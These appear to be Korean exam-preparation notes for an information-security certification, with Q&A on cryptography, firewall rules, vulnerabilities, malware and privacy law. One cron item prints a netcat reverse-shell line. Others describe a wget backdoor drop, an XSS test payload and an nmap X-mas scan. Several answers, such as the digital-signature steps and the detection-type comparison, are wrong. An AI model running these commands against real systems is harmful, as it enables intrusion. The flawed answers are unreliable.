1)
기밀성 - 인증을 받은 사용자 만이 정보 자원에 접근할 수 있도록 하는 것.
무결성 - 정보 자원에 대한 정확성, 완전성을 보호한다.
가용성 - 필요 시 허가된 사용자가 바로 접근할 수 있도록 하는 것.
인증 - 이용자에 대한 신원을 확인하는 것
부인방지 - 행위에 대해 향후에 부정하는 것을 방지하는 것
책임 추적성 - 각 개인은 유일하게 식별되어져야 하며, 행위에 대한 책임을 부여한다.
2)
벨라파둘라 모델 - 기밀성을 강조한 모델로써 No read up과 No write down 정책을 적용한다.
비바 모델 - 상업적 무결성을 강조한 모델로써 No write up과 No read down 정책을 적용
3)
FIDO의 3가지 주요 프로토콜
Authenticator Registration - 인증 토큰을 조회하고 검증, 등록하는 프로토콜
User Authentication - 인증 메시지로 사용자를 인증한다.
Secure Transaction Confirmation - 서버가 클라이언트에게 전자서명으로 특정거래 거래내용을 확인
4)
대칭키 암호화 알고리즘의 공격 방식
암호문 단독 공격 - 암호문을 보고 암호를 풀어내는 공격
알려진 평문 공격 - 암호문에 대응하는 약간의 평문 정보를 아는 상황에서 풀어내는 공격
선택 평문 - 평문을 선택해 암호문을 얻을수 있는 상황에서 공격
선택 암호문 - 암호문을 선택해 평문을 얻을 수 있는 상황에서 공격
5)
전자서명 송신 절차 - 메시지를 해시함수로 해시값 생성(메시지 다이제스트) -> 송신자 사설키로 메시지 암호화 (메시지 시그니처) -> 메시지 시그니처를 송신자 비밀키로 암호화 -> 암호화한 메시지를 수신자 공개키로 암호화
전자서명 수신 절차 - 수신자 개인키로 암호 해제 -> 송신자 비밀키로 암호 해제 -> 해시함수로 해시 복원 -> 송신자 공개키로 전자서명 검증
6)
char space[50];
strcpy(argv[0],space);
printf....
위 취약점명과 설명, 취약한 구문, 해결방안
취약점명-버퍼오버플로
취약구문-strcpy(argv[0],space);
해결방안-ASLR(메모리 주소 배치 공간을 난수화하여 메모리 주소 한계를 알지 못하게 한다.)
스택 가드(복귀주소와 변수값 사이에 특정값을 넣어두고 특정값이 변조되면 차단)
7)
프로세스 교착상태 정의,조건,해결방안
정의-다중프로그래밍 환경에서 여러개의 프로세스가 동시에 서로가 가진 자원을 가지기 위해 무한정 대기하는 현상
조건-상호배제,환형대기,비선점,점유와 대기
상호배제-자원이 비공유 모드로 점유
환형 대기-원형으로 자원을 가지기 위해 대기하는것
비선점-자원을 강제적으로 선점할 수 없는것
점유와 대기-최소한 하나의 자원 점유한채 다른 자원 대기
해결방안-교착상태를 예방하거나 회피한다. 교착상태가 되도록 허용한 후 회복한다.
예방-교착상태 발생 조건중 하나를 성립되지 않도록 한다.
회피-은행원 알고리즘,자원할당그래프알고리즘,안전상태
회복-자동적으로 교착상태로부터 회복
탐지-교착상태가 발생했는지 점검하는것
8)
IPSEC 터널모드-게이트웨이간, 서버와 게이트웨이 간 등 통신에서 사용하며, 모든 데이터를 암호화하고 새로운 ip헤더를 추가해서 전송하는 모드
전송모드-end to end 통신에서 사용하며 IP payload만 암호화하고 전송하는 모드
9)192.168.0.0/16 b클래스 모든 대역의 모든 ip주소중 끝자리 1~127까지의 모든 ip주소에 대해 telnet,dns,web,smtp에 대한 x-mas 스캔
위 문제에 대한 nmap 구문
nmap -sX -p 23,53,80,25 192.168.*.1-127
10)
여러 외부주소부터 syn을 받는 공격에 대한 공격명, 대응방안(서버,네트워크 측면)
공격명-DDOS
대응방안-
서버:KeepAliveTime을 300000으로 설정하고 SynAttackProtect를 1로 설정한다.
네트워크:DDOS 대응 장비를 통해 syn flooding을 막는다.
KISA의 DDOS 대피소를 통해 공격을 원천 차단한다.
11)
모바일 기반 서비스를 안전하게 구축하기 위한 보안 인프라 기능 서술
종단간 암호화
가상 키보드
단말 및 앱 위변조 방지 대책 적용
푸시 메시지를 통한 보안 경고 메시지 제공
화면 캡처 방지
12)
ipv4 -> iv6 전환하는데에는 듀얼스택,변환기,터널링 방식있는데 각 전환방식에 대해 서술
듀얼 스택-하나의 시스템에서 ipv4와 ipv6 둘다 사용
변환기-ipv4에서 ipv6로 전환 시 주소변환기를 사용
터널링-종단간 가상 터널을 생성하여 기존 ipv4가 사용하던 망을 ipv6에서 사용
13)
라우팅중 거리벡터 알고리즘과 링크상태 알고리즘, 혼합형 알고리즘에 대한 설명 및 관련 프로토콜 기술
거리벡터 알고리즘-RIP,IGRP - 거리 정보를 기반으로 인접한 라우터와 통신하는 라우팅 알고리즘
링크상태 알고리즘-OSPF,IS-IS - 자신의 영역 안의 모든 라우터의 링크 정보를 보유하여 링크 비용 기반으로 통신하는 라우팅 알고리즘
혼합형 알고리즘-BGP,EIGRP - 거리벡터와 링크상태 알고리즘의 장점만을 혼합해 사용하는 라우팅 알고리즘
14)
OWASP Moile Top 10 2016에서 발표한 보안 취약점 항목 나열
부적절한 플랫폼의 사용안전하지않은 인증안전하지 않은 통신안전하지 않은 데이터 저장불충분한 암호안전하지 않은 권한부여이용자코드품질코드변조문제점역공학불필요한기능
15)
OWASP Top 10 2017에 대해 설명
인젝션 민감한 데이터 노출 취약한 인증 취약한 접근 통제 XML 외부 개체 잘못된 보안 구성 크로스사이트스크립팅 알려진 보안 취약점이 있는 컴포넌트 사용 불충분한 로깅 및 모니터링 안전하지않은 역직렬화
16)
DNS 캐시 포이즈닝에 대한 개념 및 해결방안
개념-dns서버에 저장된 dns주소변환결과테이블에 대응하는 ip주소를 공격자가 원하는 ip주소로 변경하는 공격
해결방안-dnssec(도메인 서버로부터 받은 데이터를 PKI로 위변조 방지하는 기술)
17)
1-소스 아이피:192.168.3.1 타겟서버 아이피:192.168.3.13 서비스:ssh 차단
2-ping 차단을 위한 chain 생성 후 icmp request type 차단
위 두개에 대한 적절한 iptables 정책 작성
1.iptables -A INPUT -p tcp -s 192.168.3.1 -d 192.168.3.13 --dport 22 -j DROP
2.iptables -N ICMP iptables -A INPUT -p icmp -j ICMP iptables -A ICMP -p icmp --icmp-type 8 -j drop
18)WSUS(Windows Server Update Services) 에 대해 설명
마이크로소프트에서 윈도우와 다른 마이크로소프트 제품군을 위한 소프트웨어 업데이트 서비스로
관리자는 WSUS를 통해 자동 업데이트 파일을 배포할 수 있다.
19)
ftp 서비스 보안취약점 점검 결과 ftpusers 파일 설정에 취약점 발견, 해당 취약점에 대한 설명 후 조치방안 작성
취약점-ftp 서버를 통한 root 계정 직접 접속을 허용하게 되면 악의적인 사용자가 접근하여 패스워드같은 정보가 유출될 수 있음.
조치방안- ftpusers 파일에 root 계정 추가
20)
Connection con = db.getCon( );
Statement stmt = con.createStatement( );
ResultSet rs = stmt.executeQuery(sql);
위 소스코드가 가진 취약점 간단히 설명 및 취약점 조치하기 위한 코드로 수정
취약점 - DB에서 사용자 입력 폼 등에 대해 사용자 입력값을 검증하지 않아서 악의적인 사용자가 악성 SQL문을 삽입해서 DB 데이터를 노출하고 접근할 수 있는 SQL인젝션 취약점
코드수정-
PreparedStatement pstmt = con.prepareStatement(sql);
pstmt.setString(1,num);
ResultSet rs = pstmt.executeQuery(sql);
21)
1-망분리 적용 네트워크에 대한 보안 점검 사항
인터넷 망에서 내부 업무PC망에 접근할수 있는지 점검
(네트워크 세그먼트 풋프린트, 업무망 연결 시스템 검색)
2-일반 사내 네트워크에 대한 보안 점검 사항
비 IT 직원 PC에서 중요 자산 시스템에 접근할 수 있는지 점검
(백업서버,메일서버,업데이트 서버 등 보안 취약점 확인)
3-내부에 상주하고 있는 외부업체 네트워크에 대한 보안 점검 사항
외부업체 네트워크에서 사내망 침투 가능성 점검
(무선 WIFI망을 통한 사내망 침투 가능 여부)
위 종류가 다른 네트워크 환경에서 각 환경에 적절한 보안 점검사항 제시
22)라우팅 제공 필터링 기술 중 ingress 필터링과 egress 필터링, blackhole 필터링에 대해 설명하시오.
ingress - 외부에서 라우터 내부로 들어오는 패킷의 ip주소와 포트를 확인해서 필터링 한다.
egress - 라우터 내부에서 외부로 나가는 패킷의 ip주소를 확인해서 필터링한다.
blackhole 필터링 - DDOS 공격 방지 대책으로 특정 IP 대역의 패킷을 가상의 null 인터페이스로 보내서 패킷을 버리는 필터링 방법
23)라우터의 snmp 접근통제(acl) 설정을 ip주소가 10.0.0.2인 NMS 시스템만 접근 가능하도록 ACL을 작성
conf t
access-list 100 permit ip host 10.0.0.2 any
access-list 100 deny udp any any eq snmp
access-list 100 deny udp any any eq snmptrap
access-list 100 permit ip any any
int s/0
ip access-group 100 in
24)정보 자산 식별과 자산 목록표 작성 시 유의사항을 작성
대상 내용의 완전성 - 누락된 자산이 없도록 완전한 자산 식별
목록화 - 식별된 자산은 목록화 시켜서 정리
내용의 최신성 - 자산 내용이 변경된 경우 최신화 시켜야한다.
내용의 충분성 - 자산목록에 들어갈 내용이 충분해야한다.
25)위험관리 방안 종류 4가지에 대해 설명하시오.
위험 전가 - 간접적인 방법으로 위험을 제 3자에게 이전하는 것
위험 감소 - 보안 취약점 등을 보완해 위험성을 감소하는 것
위험 회피 - 리스크가 클 경우 위험을 감수하지 않고 포기하는 것
위험 수용 - 위험이 크지 않다고 판단 될 경우 위험을 감수하는것
26)자산에 대한 위험을 분석하여 적절한 보호대책을 우선순위에 따라 적용함으로써 투자 예방,
이러한 위험분석을 체계적으로 수행하기 위한 절차를 설명
자산분석 위험 분석 취약성 분석 위험도 산정 보호대책 수립
27)로그를 분석하는 EventCombMT, Log-parser, logcheck 도구에 대해 간략히 설명
EventCombMT : 마이크로소프트에서 제공하는 도구로 여러 서버에서 이벤트를 파싱할 수 있는 다중 스레드 도구
Log-parser : 윈도우 로그 파일에 대해 쿼리를 보내서 의심스러운 로그 등을 분석하는 도구
logcheck : Unix 시스템에서 실시간으로 로그를 분석해서 해킹 시도 등 비정상적인 패턴 정의 후 경고를 알려주는 도구
28)ntlast를 활용하여 아래 각 원하는 정보를 얻기 위한 구문을 작성
1-현재 시스템에 로그인한 사용자 확인 ntlast -i
2-로그인 시도 시 실패 목록 ntlast -f
3-특정 계정에 대한 로그인 로그 확인 ntlast -i -v -u 계정명
4-마지막 성공한 원격 로그인 ntlast -r
29)백도어로 인한 사고, 로그의 각 단계별 분석내용 작성 //207페이지 활용
1.id 명령어를 활용해서 웹서버에 취약점이 있는지 확인하고 웹서버 구동 권한 정보를 확인
2.wget 명령어를 이용해서 r0nin 백도어 파일을 업로드 한다.
3.cd 명령어로 디렉터리 이동 후 chmod 명령어로 r0nin 백도어 파일에 실행권한을 부여한 후 백도어를 실행시킨다.
30)아파치 access log 파일 포맷 정의 시 포맷에서 각 파라미터가 의미하는 내용 설명
%h - 원격 호스트 이름
%l - 클라이언트 ID
%u - 인증 시 사용자 ID
%t - 요청 시간
r% - 요청 첫번째 줄
%>s - 요청에 대한 마지막 상태 코드
%b - 전송 바이트 수
%{Referer}i - 요청 HTTP 헤더 Referer 값
%{User-Agent}i
31)Honeypot의 개념 및 구조
개념 - 실제로 공격자에게 공격을 당하는 것처럼 속여서 공격자의 정보 수집 및 추적을 할 수 있도록 한다. client side 허니팟과 server side 허니팟이 존재한다.
구조 - VMWARE : 하나의 시스템으로 방화벽과 IDS, 허니팟,로그서버 같이 운영
GEN-1:자동화된 도구의 공격과 웜 공격 수집에 최적화
GEN-2:방화벽과 IDS가 합쳐진 것으로 snort에 의해 탐지되는 패킷 2계층에서 차단 가능
32)내부 메일서버 10.10.10.2가 내부 라우터 serial0를 통해 메일 서비스가 제공될때
메일서비스 이외 접근은 별도 모니터링 위해 원격로그 서버인 10.10.10.50에 저장하려고 한다.
원격로그 설정 시 로깅장치는 mail로 로깅 수준은 debugging으로 할 때 라우터 ACL 및 로깅 설정을 작성
conf t
logging 10.10.10.50
logging facility mail
logging trap debugging
access-list 100 permit tcp any any established
access-list 100 permit tcp any host 10.10.10.2 eq smtp
access-list 100 deny ip any any log
int s/0
ip access-group 100 in
33)
통합 로그관리 시스템 구축, 로그 수집 대상은 application 서버, EAI, 채널중계시스템,
대외계시스템, 네트워크시스템, 보안시스템이며 로그는 별도의 스토리지에 보관할 예정,
시스템 구축하기 위한 세부 시스템 별 요구 기능을 제시
관리자 시스템 - 에이전트 모니터링,로그 수집 및 분석 기능 모니터링..
로그 수집 시스템 - 로그 실시간 수집 및 저장
로그 수집 에이전트 - 로그 추출 ,보관 및 전송
로그 분석 시스템 - 로그 실시간 분석
스토리지 - RAID 구성, 대용량 로그 백업
34)
슬랙 스페이스의 개념 및 종류에 대해 설명
개념-저장매체의 물리적인 공간과 논리적인 공간의 차이로 인해 발생하는 낭비되는 빈 공간
종류-램슬랙,드라이브슬랙,볼륨슬랙,파일시스템슬랙
35)
대용량 데이터를 처리하는 데 하둡이라는 기술을 많이 쓰고 있다. 하둡의 개념과 구성, 특징에 대해 설명
개념-저성능의 여러 PC들을 모아서 마치 하나의 시스템처럼 구성하여 대용량 데이터를 처리할 수 있게 하는 기술
구성-대용량 파일을 저장할 수 있도록 하는 분산파일 시스템과 자원을 이용하여 빠른 처리를 할수 있게 해주는 맵리듀스 컴퓨팅 플랫폼으로 구성
특징-하둡 에코시스템은 다른 하둡 추가 애플리케이션을 활용할 수 있다. 대표적으로는 하둡, 하이브, 피그 그리고 이들을 관리하는 주키퍼가 있다.
36)
침해사고 대응 단계를 제시하고 각 단계별 주요 내용을 설명
사고 전 준비 - 침해사고 대응팀과 조직적인 준비
사고 탐지 - 장비의 이상 징후 탐지
초기 대응 - 초기 조사 수행, 사고 정황적인 상황 기록, 사고대응팀 소집
대응 전략 체계화 - 최적의 전략을 결정하고 관리자의 승인을 받는다.
데이터 수집 - 침해 사건을 분석하기 위해 증거들 수집
데이터 분석 - 수집한 증거들을 기반으로 전체적 조사 수행
보고서 작성 - 분석한 데이터를 활용해 의사결정자가 쉽게 볼수있는 형태로 보고서 작성
37)
ISMS와 PIMS, 두개가 결합된 ISMS-P가 있다. 3가지 인증체계의 개념 및 인증 기준을 중심으로 비교 설명
ISMS - 기업이 주요 정보자산을 보호하기 위한 정보보호관리체계가 인증 기준에 적합한지 심사하고 인증을 하는 제도
PIMS - 기업이 개인정보보호 관리 체계를 잘 갖추고 개인정보보호 업무를 잘 수행하는지 심사하고 인증을 하는 제도
ISMS-P - 정보보호 및 개인정보보호 관리체계를 잘 갖추었는지를 한국인터넷 진흥원 혹은 인증기관이 심사하고 인증하는 제도
38)
GDPR에서 대응 차원에서 EU 적성성 평가심의를 받는데 EU 적정성 평가가 무엇인지 설명
제3국이 개인정보 보호 관리 대책을 잘 세우고 있어서 EU 시민의 개인정보를 이전하는데
문제가 없을지 심사해서 평가 후 허용하도록 처리하는 제도로 승인을 받으면 제 3국의 기업은
EU 기업과 마찬가지로 EU 시민의 개인정보를 국외로 이전하여 활용이 가능해진다.
39)
ISO 27014에서 제시한 정보보호 거버넌스에 대해 설명
조직 전반에 걸친 정보보호 목표를 달성하기 위해 지시와 통제 활동을 수행하기 위한 이사회와 최고경영층의 역할 및 책임
40)
개인정보의 안전성 확보 조치 기준 5가지 이상 기술
개인정보의 파기,개인정보 암호화,접근 통제,물리적 안전조치 적용, 재해재난 대비 안전조치 적용, 악성프로그램 방지
41)
GDPR에서 정하고 있는 컨트롤러, 프로세서, 가명화, 프로파일링에 대해 설명
컨트롤러-개인정보 처리를 결정하는 주체
프로세서-컨트롤러 대신해서 처리하는 위임받은 자
가명화-개인정보를 분리하고 가공하는 작업, 가명화된 데이터는 공익 목적에 한해 활용 가능
프로파일링-개인의 특성을 예측하는 모든 형태의 자동화된 개인 정보
42)
SSRF에 대해 설명
Server Side Request Forgery로 공격자가 웹서버와 같은 외부에 노출된 서버로 접근하여 내부로 침투 후 내부에서 공격자가 강제로 설정한 제어동작을 수행하도록 하는 공격방식
43)블록체인 도입시 키를 안전하게 보관하고 유출된 키로 불법거래가 안되도록 다중서명 기술을
통해 대응해야 한다. 다중서명 기술이란 무엇인가?
복수의 키로 서명해야만 거래 요청이 가능한 기술로 키는 자산의 소유자와 제 3기관이 보유한다.
44)
인증없이 무단으로 PC조작이 가능한 블루킵 공격에 대해 설명하시오.
공격자가 조작된 원격 프로토콜 패킷을 전송하여 임의 코드를 실행할 수 있는 취약점으로 win xp, win7 등의 제품에 영향
45)
IOT기기를 이용한 DDOS 공격이 증가하고 있는데 OWASP에서 제시한 IOT의 안전한 인증 구현 방안에 대해 설명하시오.
강력한 패스워드 사용 유도 및 안전한 패스워드 복구 메커니즘 제공
Credential 에 대한 보호기능 제공
2-factor 인증 제공
보다 세분화된 접근 제어 및 재인증 기능 구현
46)BEC(Business Email Compromise) 공격에 대한 대응방안 3가지 이상 제시하고 간략히 설명
CDR - 컨텐츠를 분해해서 악성코드를 제거하고 재조립 하는 기술
DMARC - 발신자 이메일 주소 사칭 여부 검증
SPF - 메일 서버가 안전한 서버인지 제 3 공증기관에게 검증받는 것
47)의료정보시스템의 부채널 공격기법중 하나로 암호화된 의료 정보를 전기소모량, 전자기소모량 등을 통해 분석해서 암호키를 유추하는 공격, 해당 공격명과 종류, 대응방안을 제시
공격명-전력분석공격
종류-simple power analysis - 시간 경과에 따라 시각적으로 사용량 해석하여 분석
differential power analysis - 통계적으로 분석하여 공격
대응방안 - 두개 이상의 파워 서플라이와 전력 회로 도입
48)스머프 공격과 랜드 공격에 대해 간략히 설명하고 라우터 상 대응방안을 제시
스머프 공격 - Icmp echo Request를 공격 대상 시스템의 요청으로 조작해서 브로드캐스트해서
Icmp echo reply가 공격 대상 시스템에게 집중되도록 하는 공격
대응방안 - 다른 네트워크에서 오는 directed broadcast 패킷을 차단
랜드 공격 - 공격 대상에게 출발지의 IP주소와 목적지의 IP주소를 같게 조작 하여 패킷을 전송하는 공격
대응방안 - 출발지와 목적지 IP주소가 같은 패킷을 차단
49)access list 1 deny - tcp any any eq 23
위 ACL 정책에 대한 iptables 정책 작성
iptables -A FORWARD -p tcp -m tcp --sport 23 -j DROP
iptables -A OUTPUT -p tcp -m tcp --dport 23 -j DROP
50)/tmp 폴더 내에 setuid, setgid가 설정된 파일을 find 명령어를 통해 찾는 구문을 작성
find /tmp -user root -type f \(-perm -04000 -o -perm -02000 \) -xdev -exec ls -al{}\;
51) 2020년5월28일21시23분 이후 침투가 이루어졌고, 침투 후 dev 디렉터리 내에 백도어를 설치
한 것으로 판단되어 해당 디렉터리를 대상으로 침투 시간 이후 생성된 파일을
find로 검색하는 검색 구문을 작성
touch -t 202005282123 /tmp/date.txt
find /dev -newer /tmp/date.txt
52)
GET Flooding with Cache Control (CC Attack)에 대해 설명하시오.
http 캐시 옵션을 조작해서 캐시 서버로 가야할 캐싱자원들을 웹 서버가 처리하도록 하여 캐시 서버를
무력화 하고 웹 서버에 자원을 소모하는 공격, 옵션은 no-store,must-revalidate를 사용
53) IPSec의 ESP와 AH에 대해 각각 설명하고, preshared key에 대해 설명
ESP-모든 패킷을 암호화 하고 해시코드를 추가한다.
AH-데이터 암호화 없이 해시코드만 추가한다.
preshared key-IPSec 연결을 인증하는 데 사용되는 문자열
54) KISA ISMS 프레임워크에서 정한 정보보호 5단계 관리 과정에 대해 설명
정책 수립 및 범위 설정
경영진 책임 및 조직 구성
위험 관리
정보보호정책 구현
사후 관리
55) MAC 주소 체계 및 MAC Address Filter에 대해 설명 후 이를 우회하는 취약점에 대해 설명
MAC주소체계 - 로컬 네트워크 통신에서 장치의 인터페이스를 유일하게 식별하는 주소로써 48비트에 16진수로 표현된다.
MAC Address Filter - MAC주소를 이용한 접근 제어를 의미하며, MAC 주소는 네트워크 카드마다 고유하게 할당되므로 특정 장치에 대한 네트워크 접근 차단 가능
우회하는 취약점-MAC 주소 위조, 불법 AP 추가 설치, 무선 LAN 주파수 공격
56) 망분리의 대표적인 구축 방식인 논리적 망분리와 물리적 망분리에 대해 설명
논리적 망분리 - 가상화 기술을 이용하여 외부망과 내부망을 분리, 인터넷 사용시 가상화 기술을 이용해서 인터넷 접근
물리적 망분리 - 2대 이상의 기기를 사용하여 외부망과 내부망을 분리, 내부망 pc와 인터넷 pc가 별도로 존재하거나 망전환 스위치를 사용한다.
57)해당 악성코드의 주요 기능 //284 페이지 참조
호스트파일 변조 악성코드로써, 특정 백신 업데이트 시 업데이트를 하지 못하도록 업데이트 페이지 접근 시 127.0.0.1 주소로 리턴시키는 악성코드
58)악의적인 스크립트를 삽입하여 사용자 세션 도용, 악성코드 유포할수 있는 취약점 - 이에 대한 취약점 명, 진단방법 및 기준, 대응방안을 설명
취약점명-XSS
진단방법 및 기준-게시판과 같은 스크립트 입력 폼에 <script>alert("hello World")</script> 스크립트 구문 작성, 저장 후 열었을때 alert가 뜨면 취약, 아니면 취약하지 않은것
대응방안-"<"와 같은 특수문자들을 replaceAll 메소드를 활용하여 다른 문자로 변경시키거나 모든 사용자 입력폼을 대상으로 스크립트 구문에 들어갈 특수문자들을 필터링한다.
59)전자서명법에서 정한 공인인증서에 필수적으로 포함될 사항을 5가지 적으시오.
전자서명 생성 -> ㅁ -> Message Digest -> ㅁ -> 서명값
전자서명 검증 <- ㅁ <- '' <- ㅁ <- 서명값
위 ㅁ = SHA1 , 송신자 개인키 , 송신자 공개키,SHA1
포함될 사항 - 공인인증서 일련번호, 공인인증기관의 명칭, 공인인증서 유효기간, 가입자의 이름, 공인인증서임을 나타내는 표시
60)재난 복구 센터를 구축 유형별로 설명
mirrored site - 일차 사이트와 동일하게 구성, 데이터 동기화 | HVAC,네트워크,시스템,데이터
hot site - 신속한 가용성, 호환성 테스트 가능 | ...
warm site - 필요시 hot site 전환 가능, 저렴한 구축비
cold site - 구축비용 최소화 , 데이터 백업만 준비
61)Snort는 Rule Header와 Rule Option으로 구성되는데 2가지 구성요소별 종류를 나열하고 기본 Rule 형태 작성
Rule Header- Alert,Log,Pass,Activate,Dynamic,Drop,sdrop,reject
Rule Option-msg,rev,content,offset,nocase
기본 Rule 형태- rule header tcp,udp,icmp,ip 출발지아이피 포트 -> <> 목적지아이피 포트 rule option
62) 국내 금융권 및 방송사 대상 MBR 영역과 VBR(Volume boot record)를 손상하는 등
디스크 파괴행위를 한 악성코드이다. 해당 악성코드명과 주요 기능을 설명
악성코드명 - 3.20 사이버테러 악성코드
주요 기능 - 디스크 손상 (3.20일 특정 시간이 되면 MBR영역에 접근해 특정 문자열로 값을 변조 후 재부팅시켜 정상 부팅되지 않도록 함)
백도어 기능 (감염 PC 정보를 수집하고 공격자가 원하는 명령을 수행)
63) <? php if(isset($_REQUEST["message"])) 아래 php 소스코드 보고
관련 취약점명 적고 취약점에 대한 설명 및 대응방안 작성 // 293 페이지
취약점명-코드 인젝션
설명-악의적인 목적으로 외부 php코드를 웹애플리케이션에서 정상적인 기능으로 보이게끔 해서 실행시키는 공격
대응방안-message 출력 부분에서 htmlspecialchars 함수를 이용해 악의적인 코드 실행 방지
64) 사이버 포렌식 수행 절차를 단계별로 설명
수사 준비 - 포렌식 도구를 준비하고 피의자에 접근
증거 수집 - 증거물 획득 시에는 증거수집자와 이를 감독한 사람 그리고 이를 인증해주는 사람으로 구성,
컴퓨터의 하드드라이브에 있는 증거수집, 복사작업한 원본매체는 사진 촬영, 모든 매체에 적절한 증거라벨 부착
보관 및 이송 - 연계보관성 원칙에 따라 안전하게 이송 및 보관
분석 및 조사 - 무결성 확인할수 있는 정보를 단계마다 기록하고 프로그램은 법정에서 인정한 프로그램 사용,
분석 및 실행 결과는 문서화
법정 제출 - 분석 및 조사해서 문서화한 자료를 법정에 제출
65) 정적분석과 동적분석 각각에 대해 설명하고 해당 분석을 위한 분석도구 각각 3가지씩 작성
정적분석-프로그램을 실행하지 않고 디스어셈블러를 이용해서 내부구조와 동작 분석을 하는 것, 도구:PE 분석도구,리소스 분석도구,HEX 분석도구
동적분석-직접 프로그램을 실행하고 디버깅을 이용해서 동작을 분석을 하는 것, 도구:프로세스 분석 도구,네트워크 분석 도구,디스어셈블러
66) 버퍼오버플로우에 대해 설명하고 대응방안 3가지 이상 제시
설명-할당된 메모리 영역보다 큰 데이터를 삽입해서 오류를 일으켜 초과한 영역의 데이터가 노출될 수 있는 취약점
대응방안
ASLR - 주소공간 배치를 난수화시켜서 메모리 주소 한계를 알 수 없도록 하는 것.
스택가드 - 복귀주소와 변수 사이에 특정 값을 저장한 뒤 이 값이 변조가 되면 차단하는 것.
취약한 함수 사용 금지 - strcpy,scanf와 같은 버퍼오버플로에 취약한 함수 사용 금지.
67) 2013년 6월 25일 디도스공격 등을 수행한 악성코드에 대한 악성코드 명과 주요기능 설명
6,25 사이버테러 악성코드
주요기능- 디도스 공격 : 메인 드롭퍼에서 윈도우 운영체제 버전과 환경을 확인해서 각각 다른 악성코드를 생성
디스크 파괴 기능: MBR 영역을 파괴해서 부팅이 정상적으로 되지 않도록 한다.
계정 비밀번호 변경:감염된 PC의 사용자 계정의 비밀번호를 변경시킨다.
68) ADMIN$ IPC$ 원격 IPC 와 같은 설정 화면에서 확인되는 취약점에 대해 설명 후 조치방안 작성
하드디스크 기본 공유 제거 취약점 - 기본 공유를 허용할 경우 비인가자가 불법적으로 접근해서 모든 시스템 자원에 접근할 수 있다.
조치방안 - 레지스트리의 AutoShareServer 키값을 0으로 설정한다.
또한, 컴퓨터 설정에서 공유 설정을 공유 중지로 변경한다.
69) #CONSOLE=/dev/console 서버취약점 점검 결과 아래 구문이 나왔다 취약점 명과 조치방안을 작성
루트 원격 로그인 취약점 - root 계정에 원격 로그인 허용 시 시스템 인증 정보가 노출될 수 있다.
조치방안 - 시스템 관리를 위한 원격 접속은 오프라인 콘솔을 통해 접근해야한다, # 주석 제거
70) 오용탐지와 이상탐지에 대해 설명
오용탐지-미리 정의된 악성 패턴을 등록한 후 해당 패턴과 일치하는 패턴이 발견되면 차단하는 탐지 방식, 가용성을 위한 방식이며 false negative가 크고 제로데이 취약점 대응이 힘들다.
이상탐지-정상정인 패턴을 정의해 두고 정상적인 패턴과 벗어나는 패턴이 발견되면 차단하는 탐지 방식, 기밀성을 위한 방식이며 flase positive가 크고 제로데이 취약점 대응가능
71) OAuth2.0 기술에 대해 설명
비밀번호를 제공하지 않고 사용자에 대한 접근 권한 인증을 받을수 있는 http 기반 보안 프로토콜이다.
모든 통신에 https를 수행한다.
72) SSL 구조에 대해 설명(Layer)
handshake layer - 사용할 암호화 알고리즘을 정하고 키를 분배하는 역할을 수행하며, PKI 기반 사용자 인증을 수행한다.
record layer - handshake layer에서 정한 암호화 알고리즘으로 메시지를 암호화한다.
73) jsp 파일 업로드 후 실행이 되는 취약성 확인 과정에서 나오는 취약점 명과 조치방안 작성
파일 업로드 취약점
조치방안 - jsp,php와 같은 확장자를 가진 파일을 업로드 할 수 없도록 해당 확장자를 가진 파일들의 업로드에 제한을 건다.
경로 순회 기능을 제거하여 상위 디렉터리에 접근할 수 없도록 한다.
실행 파일의 웹상에서 실행 가능한 속성 및 권한을 제거한다.
74) Kimsuky APT에 대한 악성코드 주요기능 설명
키로거:감염된 PC의 키보드나 마우스로 타이핑한 값에 대해 로깅을 해서 입력한 값에 대한 노출
정보 탈취:감염된 PC의 시스템 정보를 탈취하고, 수집한 파일과 로그 등을 해커에게 전송한다.
원격제어:Teamviewer를 변조한 것으로 원격제어를 한다.
75) gateway dawin을 지나는 1024byte보다 큰 패킷들 출력
위에 대한 tcpdump 구문을 작성
tcpdump 'gateway dawin and ip[2:2] > 1024'
76) 버퍼 오버플로우에 대응하기 위한 카나리아 단어 기법의 개념과 방식, ASLR 기법 개념 및 방식을 설명
카나리아 단어 기법 개념 - 스택가드라고도 하며, 복귀주소와 변수 사이에 특정한 값을 저장한다.
방식 - 특정한 값이 변조되면 문제가 생긴것으로 보고 차단한다.
ASLR 개념 - 메모리 주소 공간 배치를 난수화 시킨다
방식 - 메모리 주소 공간 배치 난수화를 통해 메모리 버퍼 크기를 예측하지 못하게 한다.
77) iptables -j 옵션의 DROP과 REJECT에 대한 동작방식 차이 설명
DROP-차단한 패킷에 대한 메시지를 보내지 않는다.
REJECT - 차단한 패킷에 대해 ICMP RST 메시지를 이용하여 거절 응답 메시지를 보낸다.
REJECT는 응답 메시지에 많은 정보가 들어가고 리소스 사용이 많아지므로 DROP이 좋다.
78) 100만명 이상, 100억원 이상인 정보통신서비스 제공자는 연 1회 개인정보 이용내역을 통지해야한다.
통지해야할 정보 3가지 작성
개인정보를 수집 및 이용한 내용 그리고 수집한 개인정보의 항목
개인정보를 처리 위탁받는 자와 처리 위탁하는 내용
개인정보를 제공받는 자와 제공한 개인정보의 항목
79) TCP FLAG 비트 문제 // 323페이지
80) ifconfig eth0에서 PROMISC 나왔을때 예상 가능한 공격명과 판단 이유, 위 문제를 해결하기 위한
명령어, 해당 공격이 발생한 시점을 찾기 위한 로그파일은 무엇인지 작성
패킷 스니핑 - PROMISC 모드는 해당 인터페이스를 통해 송수신되는 모든 패킷을 확인할 수 있으므로 정보가 노출될 수있다.
해결 명령어 - ifconfig eth0 (-promisc)
로그파일 - /var/log/messages
81) SLE의 개념 및 계산법, ALE의 개념 및 계산법,
연수익이 5천만원인 사이트 위험 완전제거 비용이 연간 1억이라고 할때 이 사이트의 ROI에 대해 작성
SLE-단일예상손실액으로 특정한 위협 발생시 예상되는 1회 손실액, EF * 자산가치
ALE-연간예상손실으로 매년 특정한 위협이 발생할 예상 빈도수, SLE * ARO
ROI-50%
82)개인정보 유출 사고 발생 시 정보통신망법에 따라 지체없이 주요사항 5가지 고시해야 한다.
5가지 주요고지 사항은?
개인정보 유출 항목
이용자가 연락할 수 있는 상담 전화번호
개인정보 유출된 시기
이용자가 취할수 있는 조치
정보통신서비스 제공자의 대응조치
83) cron 스케줄 작업 2건에 대한 발생가능한 위험 기술
#crontab -l
0 0 6 * * root /bin/cp /tmp/passwd1 /etc/passwd
0 0 12 * * root /usr/bin/nc 10.10.10.10 80 -e /bin/bash
1- 인증받지 않은 passwd 파일이 계정 passwd 파일을 덮어쓴다.
